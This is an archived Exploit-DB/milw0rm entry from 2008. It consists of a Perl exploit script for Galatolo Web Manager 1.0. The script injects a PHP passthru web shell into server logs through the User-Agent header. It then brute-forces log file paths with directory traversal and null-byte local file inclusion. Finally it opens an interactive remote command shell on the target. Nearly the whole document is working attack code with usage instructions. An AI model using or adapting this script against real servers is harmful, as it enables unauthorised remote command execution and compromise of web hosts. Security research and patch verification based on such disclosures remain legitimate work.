Galatolo Web Manager 1.0 - Cross-Site Scripting / Local File Inclusion

EDB-ID:

5758

Author:

StAkeR

Type:

webapps

Platform:

PHP

Published:

2008-06-08

#!/usr/bin/perl 
# Galatolo Web Manager 1.0 Remote Command Execution Exploit
# by yeat - staker[at]hotmail[dot]it

use IO::Socket;
use LWP::UserAgent;

my ($lwp,$response) = new LWP::UserAgent;
my ($host,$path) = @ARGV;


if (@ARGV != 2) {
   print "Galatolo Web Manager 1.0 Remote Command Execution Exploit\n";
   print "by yeat - staker[at]hotmail[dot]it\n";
   print "Usage: perl $0 [host] [path]\n";
   exit;
}  

inject_log();
shell_exec();


                                  
sub log_path
{
     my $path = undef;
    
     my @logs = (
          "../../../../../var/log/httpd/access_log", 
          "../../../../../var/log/httpd/error_log",
          "../apache/logs/error.log",
          "../apache/logs/access.log",
          "../../apache/logs/error.log",
          "../../apache/logs/access.log",
          "../../../apache/logs/error.log",
          "../../../apache/logs/access.log",
          "../../../../apache/logs/error.log",
          "../../../../apache/logs/access.log",
          "../../../../../apache/logs/error.log",
          "../../../../../apache/logs/access.log",
          "../logs/error.log",
          "../logs/access.log",
          "../../logs/error.log",
          "../../logs/access.log",
          "../../../logs/error.log",
          "../../../logs/access.log",
          "../../../../logs/error.log",
          "../../../../logs/access.log",
          "../../../../../logs/error.log",
          "../../../../../logs/access.log",
          "../../../../../etc/httpd/logs/access_log",
          "../../../../../etc/httpd/logs/access.log",
          "../../../../../etc/httpd/logs/error_log",
          "../../../../../etc/httpd/logs/error.log",
          "../../.. /../../var/www/logs/access_log",
          "../../../../../var/www/logs/access.log",
          "../../../../../usr/local/apache/logs/access_log",
          "../../../../../usr/local/apache/logs/access.log",
          "../../../../../var/log/apache/access_log",
          "../../../../../var/log/apache/access.log",
          "../../../../../var/log/access_log",
          "../../../../../var/www/logs/error_log",
          "../../../../../var/www/logs/error.log",
          "../../../../../var/log/apache2/error.log",
          "../../../../../var/log/apache2/access.log",
          "../../../../../usr/local/apache/logs/error_log",
          "../../../../../usr/local/apache/logs/error.log",
          "../../../../../var/log/apache/error_log",
          "../../../../../var/log/apache/error.log",
          "../../../../../var/log/access_log",
          "../../../../../var/log/error_log"
     );
     
     $lwp->agent('Lynx (textmode)');
     
     for (my $i=0;$i<=$#logs;$i++) {
        $response = $lwp->get("http://$host/$path/index.php?cmd=echo '<yeatr0x>';&com=${logs[$i]}%00");; 
        
        if ($response->content =~ m/<yeatr0x>/i) {
           $path = $logs[$i];
           break;
        }    
    }      return $path;                     
}   


sub shell_exec
{
     my $log = log_path();
     my $nos = "echo '<lulz>'";
     
     $lwp->agent('Lynx (textmode)');
     
      while (1) {
         print "\n[shell]~# ";
         chomp($cmd = <STDIN>);
     
         if ($cmd !~ /^(exit|exit--|--exit)$/i) {
            $response = $lwp->get("http://$host/$path/index.php?cmd=$nos;$cmd;$nos;&com=$log%00");
           
            if ($response->content =~ /<lulz>*/i) { 
               @split = split('<lulz>',$response->content);
               print $split[1];
            }     
        }   
        else {
           die "Exited.";
        }   
    }      
}         


sub inject_log
{
     my $header = undef;
     my $xploit = "lulz<?php passthru(stripslashes(\$_GET['cmd'])); exit; ?>"; 
     my $socket = new IO::Socket::INET (
                                         PeerAddr => $host,
                                         PeerPort => 80,
                                         Proto    => 'tcp',
                                      ) or die $!;
     
     $header .= "GET / HTTP/1.1\r\n";
     $header .= "Host: $host\r\n";
     $header .= "User-Agent: $xploit\r\n";
     $header .= "Connection: close\r\n\r\n";
     
     return $socket->send($header);
}

# milw0rm.com [2008-06-08]